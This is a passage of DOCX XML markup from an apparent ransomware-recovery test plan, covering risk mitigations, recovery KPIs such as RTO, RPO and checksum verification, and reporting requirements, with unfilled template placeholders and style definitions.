            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Document recovery time and any issues encountered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Incident Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Risk Assessment and Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This evaluation carries inherent risks, even in a controlled environment. The following mitigations have been implemented:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Isolated Test Environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> The test system is not connected to the production network and uses a dedicated virtual machine with a snapshot taken before script execution. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Backup Verification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> A full backup of the test user's home directory is created and stored on an external drive before running the encryption script. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Script Review:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> The bash script has been peer-reviewed by two senior engineers to ensure it targets only the specified directory and file types. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Passphrase Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> The test passphrase is documented in the secure password vault and is only shared with authorized evaluators. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Rollback Plan:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> In case of unexpected behavior, the virtual machine can be reverted to its pre-test snapshot within 5 minutes. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Expected Outcomes and Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The success of the recovery procedure will be measured against the following key performance indicators (KPIs):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recovery Time Objective (RTO):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Full restoration of all encrypted files within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>2 hours</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> from the start of the recovery process. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recovery Point Objective (RPO):</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Maximum data loss of no more than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>1 hour</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> of work (i.e., the backup must be no older than 1 hour at the time of the simulated attack). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Data Integrity:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 100% of restored files must pass SHA-256 checksum verification against the original backup. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Documentation Completeness:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> All steps in the checklist must be logged with timestamps, and any deviations must be noted in the final report. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="210" w:after="210"/>
        <w:ind w:start="210" w:end="210" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="36" w:space="11" w:color="2980B9"/>
          <w:shd w:fill="EAF2F8" w:val="clear"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="36" w:space="11" w:color="2980B9"/>
          <w:shd w:fill="EAF2F8" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the recovery process fails to meet any of the above KPIs, a root cause analysis must be conducted, and the backup infrastructure must be reviewed for improvements. The ransom demand of 0.5 Bitcoin (approximately {PLACEHOLDER_BTC_VALUE_USD} USD at current rates) should never be considered a viable option. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Post-Evaluation Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After completing the recovery test, the evaluation team must compile a final report containing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Date and time of the test </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Names of all participants </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Actual time to full recovery </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Number of files encrypted vs. restored </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Any errors or unexpected behaviors </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Recommendations for improving backup and recovery procedures </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="450" w:after="150"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t>Document Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0 | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t>Last Modified:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE} | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t>Approved By:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t xml:space="preserve"> {PLACEHOLDER_APPROVER}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="450" w:after="150"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
        </w:rPr>
        <w:t>This document contains confidential information intended for authorized security personnel only. Do not distribute outside the evaluation team.</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Arial"/>
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Liberation Sans Unicode MS">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="auto"/>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Courier New">
    <w:altName w:val="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2160" w:after="2160"/>
      <w:ind w:start="2160" w:end="2160" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:eastAsia="Calibri;Arial;sans-serif" w:cs="Calibri;Arial;sans-serif"/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="6" w:color="E74C3C"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="8" w:color="E74C3C"/>
      </w:pBdr>
      <w:spacing w:before="300" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="34495E"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="555555"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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trongEmphasis">
    <w:name w:val="Strong Emphasis"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>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6978" w:leader="none"/>
        <w:tab w:val="right" w:pos="11797" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1134"/>
        <w:tab w:val="center" w:pos="6978" w:leader="none"/>
        <w:tab w:val="right" w:pos="11797" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1134"/>
        <w:tab w:val="center" w:pos="6979" w:leader="none"/>
        <w:tab w:val="right" w:pos="1179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TextBody"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans Devanagari"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TextBody">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="150"/>
      <w:jc w:val="both"/>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2C3E50" w:val="clear"/>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